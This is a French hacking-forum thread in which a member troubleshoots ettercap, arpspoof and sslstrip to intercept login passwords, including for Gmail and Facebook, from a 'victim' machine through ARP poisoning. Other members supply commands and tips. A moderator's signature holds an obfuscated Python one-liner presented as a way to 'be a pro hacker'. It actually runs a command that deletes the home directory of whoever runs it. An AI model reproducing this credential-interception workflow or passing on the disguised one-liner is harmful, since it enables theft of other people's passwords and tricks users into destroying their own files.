Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 20-05-2012 21:13:53

Ares
Nouveau membre
Inscription : 20-05-2012
Messages : 8

ettercap https

Bonjour, voilà j'ai un souci avec ettercap sur mon reseau j'arrive a sniffer tous les mot de passe entrés sur des site http mais sur des sites https tels que gmail facebook ... Rien du tout !
J'ai bien éditer etter.conf

Une idée ?

Cordialement Ares

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 21-05-2012 03:35:20

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell
Inscription : 13-12-2010
Messages : 783

Re : ettercap https

Salut et bienvenue sur le forum wink

Essaies de décommenter (c'est à dire enlever les dièses "#") dans les deux lignes iptables ("if you use iptables") dans le fichier etter.conf, c'est ce que tu as fais ? sinon la cible dont tu veux sniffer le login/mdp utilise un cookie avec son site, elle ne passe pas par la page d'identification.

Sinon comme tu l'as remarqué HTTPS signifie ( HTTP + SSL ) qui assure le chiffrement des informations échangées entre un client et un serveur. Pour ça, tu peux utiliser SSLStrip dont le tuto est disponible en page d’accueil de Crack-Wifi et un autre en Pdf dans la section tuto:

--> Utilisation de Sslstrip pour une attaque man in the middle sur du https (SSL), arpspoof et hack paypal.
--> TUTO BT4 final SSLSTRIP (Bonus. ARP Poisoning + DNS Spoof + httpd).

Hors Ligne

#3 21-05-2012 10:57:48

Ares
Nouveau membre
Inscription : 20-05-2012
Messages : 8

Re : ettercap https

Bonjour, d'après ce que j'ai lu/compris pour le https avec ettercap il suffit simplement de décommenter les 2 lignes ce que j'ai fais, mais toujours RIEN ! sad

D'ailleurs quand j'ai procédé à mes tests en local, je ne passais pas par les cookies j'entrais bien toutes les informations à la main, je trouve çà bizare que j'arrive à récuperer les mot de passes http mais pas https car d'après les différents tuto que j'ai lu/vu, ettercap est tout à fait capable de le faire sans SSLStrip (dites moi si je me trompe, car les différents tuto que j'ai vu ne sont pas tout jeune).

D'ailleurs une autre chose bizare, quand je lance driftnet -i wlan 0 ben, ecran noir, alors que je navigue sur des images/videos j'ai un écran noir.

Voilà, voilà, je suis très curieux et avide de connaissance en réseau c'est pourquoi, j'aime pas quand quelque chose ne marche pas, mais avec votre aide ... smile

Cordialement Ares

Je vous précise que je n'utilise que cette commandes :
ettercap  -TqM ARP :REMOTE /ipvictim/ /iprouteur/ -i wlan0

Je n'utilise pas la redirection des ip tables ni arpspoof peut etre le problème vient-il de la mais je trouve quand meme étrange que çà marche !

Pourriez-vous m'expliquer rapidement à quoi sert arpspoof merci.

Et j'ai pas très bien compris la nuance entre Arp spoofing et Arppoisonning c'est casi la même méthode ?

Dernière modification par Ares (21-05-2012 13:22:55)

Hors Ligne

#4 22-05-2012 19:18:14

Ares
Nouveau membre
Inscription : 20-05-2012
Messages : 8

Re : ettercap https

UP !

Hors Ligne

#5 22-05-2012 21:06:31

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 008

Re : ettercap https

A peu près.
Tu n'es pas très loin de la solution.

MOUHAHAHAHAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Try harder (:         (cela dit, tes posts sont bien faits, donc je vais quand même te laisser une piste ou deux : sslstrip)


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#6 23-05-2012 13:43:24

Ares
Nouveau membre
Inscription : 20-05-2012
Messages : 8

Re : ettercap https

Voici, ce que j'ai cru comprendre d'après mes recherches :

J'explique plus clairement et dites moi si j'ai juste ou pas, donc pour sniffer un réseaux on fait ce que l'on appelle de l'arp spoofing dit également arp poisoning ou Man in The Middle, pour ce faire on peut soit utiliser la commande

arpspoof -i interface ip_victime ip_routeur

ou

ettercap -TqM ARP:REMOTE /ip_victime/ /ip_routeur/

C'est la même chose à la différence prêt que dans le premier cas, il faudra aller voir les logs et dans le deuxième cas çà s'affiche directement dans le terminal.

Là aucun souci je récupère tous les mot de passes http, je suis content, c'est super MAIS driftnet ne marche pas l'ecran reste tout noir !

Et malgré que je fais l'ip forwarding, je redirige les tables d'ip et je lance sslstrip puis ettercap avec l'option -M, RIEN, ce n'est pas normal et j'aimerais savoir pourquoi !

Le driftnet qui ne marche pas aussi je trouve çà louche.

J'espère avoir été assez claire smile. Je veux simplement savoir pourquoi çà ca ne marche pas, je suis tétu donc pas la peine d'essayer de me proposer d'alternatifs, aidez-moi Backtrackiens !

Cordialement AresS

Dernière modification par Ares (23-05-2012 13:44:49)

Hors Ligne

#7 23-05-2012 14:56:52

coyotus
Membre Irremplaçable
Lieu : fort fort lointain
Inscription : 05-08-2010
Messages : 884

Re : ettercap https

Parce que je t'invite à lire ceci https

ou il est précisé "http est la combinaison du HTTP avec une couche de chiffrement comme SSL ou TLS"

et je t'invite à lire ceci Le protocole Ssl

tu comprendra pourquoi on te parle toujours de "SSL"strip


1310812721.gif

Hors Ligne

#8 23-05-2012 15:11:00

Ares
Nouveau membre
Inscription : 20-05-2012
Messages : 8

Re : ettercap https

Justement cyotus j'utilise sslstrip et çà ne marche pas c'est pour ca que je post.

Et driftnet non plus ne marche pas.

Hors Ligne

#9 23-05-2012 17:30:54

coyotus
Membre Irremplaçable
Lieu : fort fort lointain
Inscription : 05-08-2010
Messages : 884

Re : ettercap https

Ok excuse moi dans ton post initial tu ne le précise pas et ensuite tu dit "je suis tétu donc pas la peine d'essayer de me proposer d'alternatifs".
Je pensais donc que tu t'entétais à utiliser ettercap seul.

tu as des log ou quelques chose qui pourrait donner une indication sur le problème ?

Peux-tu donner étape par étape toute ta procédure avec tes fichier de conf.


1310812721.gif

Hors Ligne

#10 23-05-2012 20:53:55

Ares
Nouveau membre
Inscription : 20-05-2012
Messages : 8

Re : ettercap https

Bonjour, je reviens pour vous dire que çà marche enfin où presque je pense bien avoir compris la méthode.

Mais j'ai pu lire sur le forum que c'etait normal que sslstrip ne marche pas avec facebook, gmail et d'autres sites qui n'ont pas de pages http, est ce que vous vous parvenez a sniffer les passwords de ces dits-sites avec sslstrip ?

Je n'ai reussi qu'avec la messagerie de Yahoo qui et en https.

Et j'ai d'autres questions (toujours plus smile, quand je ne passe pas par ettercap mais par arpspoof -i interface -t ip_victime ip_routeur). Je perds la connexion sur le pc (ip_victime) est-ce normal ?

Et aussi et encore pourquoi driftnet ne fonctionne-t-il pas ?

Merci à tous pour vos réponses !

Ares

EDIT: J'ai remarqué 2 truc pour un site comme rueducommerce par exemple le login/pswd ne s'affiche pas dans ettercap mais dans le sslstrip.log (normal ?!)
Et sslstrip m'affiche ceci, explication s'il vous plait:

[email protected]:/pentest/web/sslstrip# python sslstrip.py -p

sslstrip 0.9 by Moxie Marlinspike running...
Traceback (most recent call last):
File "sslstrip.py", line 105, in main
reactor.run()
File "/usr/lib/python2.6/dist-packages/twisted/internet/base.py", line 1170, in run
self.mainLoop()
File "/usr/lib/python2.6/dist-packages/twisted/internet/base.py", line 1182, in mainLoop
self.doIteration(t)
File "/usr/lib/python2.6/dist-packages/twisted/internet/selectreactor.py", line 140, in doSelect
_logrun(selectable, _drdw, selectable, method, dict)
--- <exception caught here> ---
File "/usr/lib/python2.6/dist-packages/twisted/python/log.py", line 84, in callWithLogger
return callWithContext({"system": lp}, func, *args, **kw)
File "/usr/lib/python2.6/dist-packages/twisted/python/log.py", line 69, in callWithContext
return context.call({ILogContext: newCtx}, func, *args, **kw)
File "/usr/lib/python2.6/dist-packages/twisted/python/context.py", line 59, in callWithContext
return self.currentContext().callWithContext(ctx, func, *args, **kw)
File "/usr/lib/python2.6/dist-packages/twisted/python/context.py", line 37, in callWithContext
return func(*args,**kw)
File "/usr/lib/python2.6/dist-packages/twisted/internet/selectreactor.py", line 156, in _doReadOrWrite
self._disconnectSelectable(selectable, why, method=="doRead")
File "/usr/lib/python2.6/dist-packages/twisted/internet/posixbase.py", line 191, in _disconnectSelectable
selectable.readConnectionLost(f)
File "/usr/lib/python2.6/dist-packages/twisted/internet/tcp.py", line 508, in readConnectionLost
self.connectionLost(reason)
File "/usr/lib/python2.6/dist-packages/twisted/internet/tcp.py", line 677, in connectionLost
Connection.connectionLost(self, reason)
File "/usr/lib/python2.6/dist-packages/twisted/internet/tcp.py", line 519, in connectionLost
protocol.connectionLost(reason)
File "/usr/lib/python2.6/dist-packages/twisted/web/http.py", line 489, in connectionLost
self.handleResponseEnd()
File "/pentest/web/sslstrip/sslstrip/ServerConnection.py", line 117, in handleResponseEnd
self.shutdown()
File "/pentest/web/sslstrip/sslstrip/ServerConnection.py", line 154, in shutdown
self.client.finish()
File "/usr/lib/python2.6/dist-packages/twisted/web/http.py", line 900, in finish
"Request.finish called on a request after its connection was lost; "
exceptions.RuntimeError: Request.finish called on a request after its connection was lost; use Request.notifyFinish to keep track of this.

Dernière modification par Ares (23-05-2012 21:53:43)

Hors Ligne

#11 24-05-2012 18:35:46

coyotus
Membre Irremplaçable
Lieu : fort fort lointain
Inscription : 05-08-2010
Messages : 884

Re : ettercap https

juste pour tester

apt-get purge sslstrip && apt-get update && apt-get upgrade && apt-get clean && apt-get install sslstrip

1310812721.gif

Hors Ligne

#12 24-05-2012 19:34:11

Ares
Nouveau membre
Inscription : 20-05-2012
Messages : 8

Re : ettercap https

Non, toujours pareil, et pareil pour ettercap parfois çà me met tout un log d'erreur double free ...
Je pense refaire une proper intsallation de BT5 peut-être ca va régler ces soucis.
Sinon coyotus, tu peux répondre à mes autres questions à savoir probleme du driftnet, si c'est bien normal que gmail, facebook ... ne marchent pas, la deconnection provoqué par la commande arp ainsi que quelques psswd qui s'affichent dans le log mais pas dans le terminal ou ettercap est lancé.

Merci.

Hors Ligne

#13 25-05-2012 05:10:09

coyotus
Membre Irremplaçable
Lieu : fort fort lointain
Inscription : 05-08-2010
Messages : 884

Re : ettercap https

Et j'ai d'autres questions (toujours plus smile, quand je ne passe pas par ettercap mais par arpspoof -i interface -t ip_victime ip_routeur). Je perds la connexion sur le pc (ip_victime) est-ce normal ?

oui, je pense que tu provoque un conflit

Et aussi et encore pourquoi driftnet ne fonctionne-t-il pas ?

Sans plus de détail je ne sais pas.


1310812721.gif

Hors Ligne

#14 25-05-2012 06:22:04

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 008

Re : ettercap https

Si tu lis bien le message de python, il te dit gentiment (avec beaucoup de mots autour, on est d'accord) que la connexion a été tuée. Pas de panique.

Je te conseille de faire un script sur lepc victime qui se connecte à deifférrents sites. Comme ça tu sauras ce qu'il se passe et ce que tu dois retrouver en écoutant.


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
20 241 10-11-2016 12:54:26 par koala
DNS spoofing + https par guillaume
0 641 04-01-2016 23:58:43 par guillaume
2 533 27-10-2015 00:21:23 par zoz25
2 1562 04-07-2014 19:43:45 par flatounet
8 1734 20-04-2014 12:25:39 par antares145

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.026 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]